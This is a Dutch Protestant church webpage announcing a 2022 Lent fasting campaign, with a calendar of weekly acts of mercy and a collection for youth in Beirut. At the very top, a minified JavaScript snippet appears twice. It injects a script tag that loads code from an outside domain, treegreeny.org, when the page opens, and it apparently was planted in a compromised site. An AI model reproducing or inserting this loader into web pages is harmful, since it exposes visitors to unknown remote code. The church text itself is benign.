;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vastenactie Veertigdagentijd "Alles komt goed?!" - PKN Damwâld

Vastenactie Veertigdagentijd “Alles komt goed?!”

Gepubliceerd op: dinsdag 22 februari 2022

De Veertigdagentijd begint op Aswoensdag en loopt tot Pasen. Van oudsher is dit een tijd van inkeer, bezinning en gebed. We staan stil bij het lijden van Jezus én bij het lijden van onze naasten, dichtbij en ver weg.

Door te vasten tijdens deze periode bereid je je bewust voor op het feest van Pasen: het feest van God die zichzelf steeds opnieuw aan ons wil schenken. Vasten schept ruimte voor verlangen naar het grote feest. Vasten kan op verschillende manieren. Sommige mensen kiezen voor het tijdelijk afzien van alcohol, vlees en/of snoep. Anderen kiezen er bijvoorbeeld voor tijdelijk geen Netflix te kijken of sociale media te gebruiken. Op de vastenkaart van Kerk in Actie staat elke week een andere vastensuggestie, waaronder ook tips voor dingen die je in de vastentijd juist extra kunt doen, zoals iemand een kaart sturen, een compliment geven, of voor iemand bidden.

Graag willen we de Vastenactie van de Kerk in Actie bij u onder de aandacht brengen. Dit jaar is het thema: “Alles komt goed?!”

Wat krijgt u aangeboden:

Bij de Paadwizer krijgt u een scheurkalender. Voor iedere dag is er een Bijbeltekst met korte overdenking, afgewisseld met vastentips, gebeden en liederen.

In de scheurkalender worden de 7 werken van Barmhartigheid gevolgd. Tijdens de diensten willen wij deze zeven werken ook onder de aandacht brengen.

Tijdens het lezen van de scheurkalender krijgt u voorstellen om op bepaalde momenten geld te sparen. De opbrengst is voor jongeren in de achterstandswijk Bourj Hammoud in Beiroet (Libanon). Dit is een overbevolkte en arme wijk, waar de problemen niet te overzien zijn. Geweld, verslaving, criminaliteit, werkloosheid en gebrek aan goed onderwijs ontneemt de jongeren die er wonen elk perspectief op een betere toekomst. Het inlevermoment van deze “spaarpotjes” wordt via de nieuwsbrief bekend gemaakt.

Kerk in Actie steunt het werk van jongerencentrum Manara in Beiroet. Kwetsbare tieners krijgen er huiswerkbe- geleiding, psychosociale hulp en vaktrainingen voor betere kansen op de arbeidsmarkt. Daarnaast kunnen ze elkaar in ontspannen sfeer ontmoeten tijdens een partijtje tafelvoetbal of air hockey. Laten we meehelpen, zodat ook deze jongeren mogen weten: Alles komt goed!

  1. Zondag 6 maart: De gevangene bezoeken. Na de kerkdienst was er gelegenheid om de paasgroetenkaarten (aangeboden door de PKN) te schrijven voor gedetineerden. De groep Sign deed mee aan de dienst en er was koffie drinken na de dienst. (zie fotoalbum!)
  2. Zondag 13 maart: De hongerige eten geven. Op 09 maart (biddag) en 13 maart was er de mogelijkheid zijn om voedsel in te leveren voor de voedselbank.
  3. Zondag 20 maart: De zieke verzorgen. We kunnen zieken om ons heen bezoeken en een kaartje sturen. Na de dienst is er voor zieken een mogelijkheid tot ontmoeting en zegening.
  4. Zondag 27 maart: De naakte kleden. Op zaterdag 26 maart was er een vintage markt in de Ontmoeting. De bedoeling was : iedereen neemt iets mee van kleding/ eigen gebakken taart/ speelgoed etc. etc. Echt mooie spullen werden per opbod verkocht en de opbrengst was voor het gekozen doel. Andere spullen werden geruild. Je bracht iets en je kon iets meenemen.
  5. Zondag 03 april: De vreemdeling herbergen.
  6. Zondag 10 april: De dorstige drinken geven. We kunnen koffie/thee/ water drinken voor de dienst. Er zullen in de kerkruimte posters hangen met ideeën wat we die week kunnen laten staan.
  7. Zondag 17 maart: PASEN: De dode begraven in de hoop. Voor de dienst is er gelegenheid om met elkaar koffie/ thee te drinken, met een klein hapje. Voor de kinderen het moment om eieren te zoeken!

Houdt u de komende periode de nieuwsbrieven goed in de gaten voor alle aanvullende informatie.

De voorbereidingscommissie